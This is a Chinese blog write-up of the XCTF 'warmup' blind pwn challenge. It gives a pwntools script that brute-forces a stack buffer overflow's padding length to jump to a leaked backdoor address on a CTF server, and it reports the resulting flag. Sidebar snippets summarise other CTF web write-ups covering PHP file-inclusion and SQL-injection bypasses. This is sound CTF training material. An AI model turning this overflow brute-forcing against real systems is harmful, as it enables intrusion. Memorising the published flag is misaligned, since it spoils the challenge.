XCTF warmup

最新推荐文章于 2024-04-10 14:02:31 发布
最新推荐文章于 2024-04-10 14:02:31 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: CTF-PWN 文章标签: 安全 python socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/104781656
版权

这题没有二进制文件
最简单的一个盲打pwn题 。虽然难的题目我还不会
只有一个ip和一个端口
nc连接上去看看
在这里插入图片描述
发现程序会给我们返回一个地址
猜测这个地址就是后门函数的地址
写了个爆破程序

from pwn import *

def blast(ip,port,padd_start,padd_end,addr):
	for i in range(padd_start,padd_end):
		try:
			p = remote(ip,port)
			p.recvuntil(">")
			payload = 'a' * i + p32(addr)
			print("32bit payload len =",i)
			p.sendline(payload)
			r = p.recv()
			if "Warm Up" in r:
				continue
			print('recv::length='+ str(len(r)) + ',content='+ r)
			p.close()
			break
		except Exception as e:
			p.close()

		try:
			p = remote(ip,port)
			p.recvuntil(">")
			payload = 'a' * i + p64(addr)
			print("64bit payload len =",i)
			p.sendline(payload)
			r = p.recv()
			if "Warm Up" in r:
				continue
			print('recv: ' + r)
			p.close()
			break
		except Exception as e:
			p.close()

blast("111.198.29.45",54880,0,200,0x40060d)

在这里插入图片描述
爆破结果
padding长度为72,程序是64位程序
flag:

cyberpeace{3c720a366924ded4e8cab660474da845}
夏了茶糜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界warmup
daqiangdetianxia的博客
07-24 326
查看源代码,发现source.php 进去source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//可以发现有hint.php
warmup(xctf)
weixin_43868725的博客
05-26 327
0x0 exp 没有附件。就是要blind pwn。nc连接了几次都给了同一个返回地址。 所以就写个循环一直试。 from pwn import * addr=0x40060D def send(sh,form,num): payload='a'*num if form == 1: payload+=p64(addr) if form == 2: payload+=p32(addr) sh.sendlineafter('&g
XCTFwarmup
z2bns的博客
10-17 642
题目地址 题目名称:warmup 题目描述:暂无 题目附件:暂无 WriteUp: 创建场景访问后的页面如下: 啥也没有,只有一个大表情,查看源码,提示<!–source.php–> source.php源码页面分析如下: <?php highlight_file(__FILE__);#函数对文件进行语法高亮显示。 class emmm { public static function checkFile(&$page)
xctfwarmup
qq_40646572的博客
10-21 638
仅一个登陆页面。 这是附件中的源码。 从上述源码可以看出,username与password被过滤了,并且没有办法进行绕过。username与password字段首先被addslashes()函数进行转义,‘、“、/都会被转义。然后在SQL类中query()函数调用waf()函数进行进一步的拦截。正常来讲,这两个字段不存在sql注入漏洞。 但关键点在于cookie,cookie处存在反序列化漏洞。首先可以构造sql类,此处有两种方法可以进行注入,进行登录绕过。 一、使用内连接进行绕过。此种方法是官方w
XCTF Web 高手区006: warmup
立志成为最会敲代码的dancer,最会locking的程序猿
04-05 429
题目: WP: 打开场景看到一张大大的滑稽.jpg 没有任何线索,只能选择看源代码 提示来了:source.php 添加到url后缀 一堆php代码,老样子,代码审计 hint.php是什么?访问一下 可见flag所在的文件名 这里有个小提示 文件名是四个f、l、a、g,所以在hint.php下会有四层目录才能找到文件 这是需要进行url编码构造payload(有效荷载) 附上一张url...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
writeup:xctf撰写
03-28
写上去xctf撰写
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTFwarm up(代码审计分析)
sunleibaba的博客
01-20 656
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的类。 第4行和第11行语句是定义类的固定语法。 第5行:利用静态方法
攻防世界xctf web Web_php_unserialize和warmup
weixin_45689999的博客
03-03 711
Web_php_unserialize 观察代码 题目需要绕过__wakeup和preg_match(’/[oc]:\d+:/i’, $var <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $fil...
XCTF-warmup
qq_39543838的博客
02-24 134
查看页面源码,找到source.php文件 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page)
XCTF-攻防世界CTF平台-Web类——6、warmup(php中include函数遍历漏洞)
Onlyone_1314的博客
11-15 1525
打开题目地址: 标题栏是Document,只有一张图片,所以我们审计源代码: 有一个source.php打开: 有一段判断页面的代码,还有一个hint.php 提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的: 所以我们继续看source.php中的代码: <?php highlight_file(__FILE__); class emmm { public static fu
2020.3.28 xctfwarmup)②
DSR446的博客
03-28 393
由于不熟悉PHP的几个函数,我查了几个小时才弄明白后面讲的什么!! 可以看到有注释source.php,访问后可以看到其源码 发现一个hint.php文件,先访问一下 我猜测flag就在这个ffffllllaaaagggg里面 现在我们就开始看看代码中讲的啥!! 这里就相当于创建一个python中的字典(当然这里是php) ...
XCTFwarmup[WriteUP],腾讯、美团网络安全面试经验分享
最新发布
2401_84185145的博客
04-10 313
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
xctf-pwn-“warmup & welpwn & monkey”
njh18790816639的博客
03-13 290
warmup 这个是没有附件的,吓了我一条,因为我没有碰见过这样的题目(本人小菜一个)便开始查资料。 漏洞挖掘 有三种方法:白盒代码审计、灰盒逆向工程、黑盒测试。其中黑盒的Fuzz测试是效率最高的一种,能够快速验证大量潜在的安全威胁。 Fuzz测试,也叫做“模糊测试”,是一种挖掘软件安全漏洞、检测软件健壮性的黑盒测试,它通过向软件输入非法的字段,观测被测试软件是否异常而实现。 Fuzz测试的概念非常容易理解,如果我们构造非法的报文并且通过测试工具打入被测设备,那么这就是一个Fuzz测试的测试例执行,大多数
XCTF高手进阶区】 web7_warmup writeup(一)
Mitchell_Donovan的博客
02-14 413
web7_warmup 原题链接 key:php代码审计 ①环境打开后页面显示一个滑稽???? 查看源代码后发现线索source.php???? ②在地址栏后加上/source.php访问,获得一段php代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
XCTF web进阶区wp(一)
0xdawn的博客
02-28 984
001 Training-WWW-Robots 查看robots.txt,发现Disallow: /fl0g.php,打开后得到flag。 002 baby_web 初始页面为index.php,bp抓包查看响应就行 003 warmup F12拿到源码链接source.php hint.php:flag not here, and flag in ffffllllaaaagggg &l...
web大手子炼成记之warmup
qq_43579362的博客
01-27 395
XCTF warmup 题目链接:题目链接 记xctf之wramup writeup!!! 打开题目链接,F12发现提示,进入source.php,代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) ...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值